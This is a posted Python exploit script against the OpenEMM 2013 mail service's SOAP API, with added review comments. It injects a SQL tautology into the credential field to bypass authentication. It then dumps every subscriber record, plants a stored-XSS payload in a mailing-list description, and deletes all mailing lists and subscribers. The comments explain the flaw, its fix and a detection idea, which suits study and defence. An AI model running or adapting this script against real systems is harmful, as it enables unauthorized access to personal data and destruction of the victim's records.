
openemm sploit

a guest
Jul 23rd, 2013
  1. import os
  2. import sys
  3. from SOAPpy import WSDL
  4. from argparse import ArgumentParser
  5. from re import sub
  6.  
  7. # Exploit Title: OpenEMM 2013 SQL Injection / Stored XSS
  8. # Date: 07/20/2013
  9. # Exploit Author: drone (@dronesec)
  10. # Vendor Homepage: http://www.openemm.org/
  11. # Software Link: https://downloads.sourceforge.net/project/openemm/OpenEMM%20software/OpenEMM%202013/OpenEMM-2013-bin.tar.gz
  12. # Version: 2013 (8.10.380.hf13.0.066)
  13. # Tested on: Ubuntu 12.04
  14.  
  15. """ Exploits a host of vulnerabilities discovered in OpenEMM.
  16.    Required ws.wsdl file should be in local directory.
  17. """
def run(options):
    """Dispatch one proof-of-concept action against the OpenEMM web service.

    Builds a SOAPpy proxy from ./ws.wsdl and runs the first action whose
    option is set, checked in this order: subscribers, mlist, dmlist, dsubs.
    Every call passes "wsadmin" and the `sploit` string as its first two
    arguments. Nothing is returned; results are printed to stdout.

    NOTE(review): the file header labels this an OpenEMM 2013 SQL injection /
    stored XSS. If a tautology string is accepted here, the service is
    presumably building its credential lookup by string concatenation; the
    second argument looks like the web-service password, confirm against the
    WSDL. The server-side fix for that class of bug is a parameterized query
    for the credential check. For detection, a quote followed by a SQL
    comment marker inside a web-service credential field is worth alerting on.
    The dmlist and dsubs branches delete data on the server they are run
    against.
    """
    wsdl_file = "./ws.wsdl"
    # Quote break-out plus an always-true condition and a trailing SQL
    # comment, sent where the calls below would otherwise carry a credential.
    sploit = "\\' OR 1=1;-- "

    _server = WSDL.Proxy(wsdl_file)

    if options.subscribers:
        # iterate until we get a null response
        # Ids are probed sequentially from 1; an empty paramValues ends the
        # loop, so idx-1 is the number of records that were printed.
        idx = 1
        while True:
            ret = _server.getSubscriber("wsadmin", sploit, idx)
            if ret.paramValues == '':
                print '[!] Discovered %d subscribers'%(idx-1)
                break

            print ret.paramValues
            idx += 1

    elif options.mlist:
        # Per the author's message, the description is stored and later
        # rendered without encoding. Defensive fix: HTML-encode the field on
        # output (and validate it on input) in the application.
        # NOTE(review): the bare except also swallows KeyboardInterrupt and
        # EOFError and silently falls back to an empty description.
        try:
            print '[!] Description field vulnerable to stored xss!'
            description = raw_input('[!] Enter mlist description: ')
        except:
            description = ''

        ret = _server.addMailinglist('wsadmin', sploit, options.mlist, description)
        if ret > 0: print '[!] Saved successfully'
        else:       print '[!] Save unsuccessful'

    elif options.dmlist:
        # Destructive: calls deleteMailinglist for ids 1, 2, 3, ... until the
        # service returns 0.
        # NOTE(review): the message prints idx although the call for idx is
        # the one that returned 0; the subscribers branch reports idx-1, so
        # this count looks one too high.
        print '[!] Deleting all mailing lists...'
        idx = 1
        while True:
            ret = _server.deleteMailinglist('wsadmin', sploit, idx)
            if ret == 0:
                print '[!] Deleted %d mailing lists.'%idx
                break
            idx += 1

    elif options.dsubs:
        # Destructive: same sequential-id loop as above, against
        # deleteSubscriber; the printed count has the same apparent
        # off-by-one.
        print '[!] Deleting all subscribers...'
        idx = 1
        while True:
            ret = _server.deleteSubscriber('wsadmin', sploit, idx)
            if ret == 0:
                print '[!] Deleted %d subscribers.'%idx
                break
            idx += 1
  68.  
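def parse_args():
    """Parse the command line and point the local WSDL at the chosen server.

    Every ``location="..."`` attribute in ``ws.wsdl`` (current directory) is
    rewritten to ``http://<host>:8080/emm_webservice``. The rewritten copy is
    staged in ``tmp.wsdl`` and then renamed over ``ws.wsdl``, so the WSDL is
    modified in place on every run.

    Returns:
        The argparse namespace with ``host``, ``subscribers``, ``mlist``,
        ``dmlist`` and ``dsubs``.

    Exits with status 1 if ``ws.wsdl`` cannot be read or the staged copy
    cannot be written.
    """
    parser = ArgumentParser()
    parser.add_argument('-i', help='server address', action='store',
                dest='host', required=True)
    parser.add_argument('-s', help='fetch all subscribers', action='store_true',
                dest='subscribers')
    parser.add_argument('-m', help='create new mailing list (XSS)', action='store',
                dest='mlist')
    parser.add_argument('--dm', help='delete all mailing lists', action='store_true',
                dest='dmlist')
    parser.add_argument('--ds', help='delete all subscribers', action='store_true',
                dest='dsubs')
    # The action flags are not mutually exclusive here; run() checks them with
    # if/elif, so only the first one set takes effect.

    options = parser.parse_args()

    # NOTE(review): options.host is written into an XML attribute unchecked; a
    # value containing '"' or '<' would leave ws.wsdl malformed.
    endpoint_attr = 'location="http://{0}:8080/emm_webservice"'.format(options.host)
    try:
        # Both handles are context-managed so the staging file is closed even
        # if a read or write fails part-way through.
        with open('ws.wsdl', 'r') as f, open('tmp.wsdl', 'w') as out:
            for line in f:
                # A callable replacement keeps backslashes in the host from
                # being read as regex group references.
                out.write(sub(r'location="(.*?)"',
                              lambda _match: endpoint_attr,
                              line))
    except IOError:
        # Single-argument print(...) behaves the same on Python 2 and 3.
        print('[-] ws.wsdl not found')
        sys.exit(1)

    # Replace ws.wsdl with the staged copy. os.rename avoids spawning a shell
    # for `mv` and raises on failure instead of ignoring the exit status.
    os.rename('tmp.wsdl', 'ws.wsdl')
    return options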
  102.  
if __name__ == "__main__":
    # Script entry point: parse_args() rewrites ws.wsdl for the given host
    # before run() loads it, so the order of these two calls matters.
    options = parse_args()
    run(options)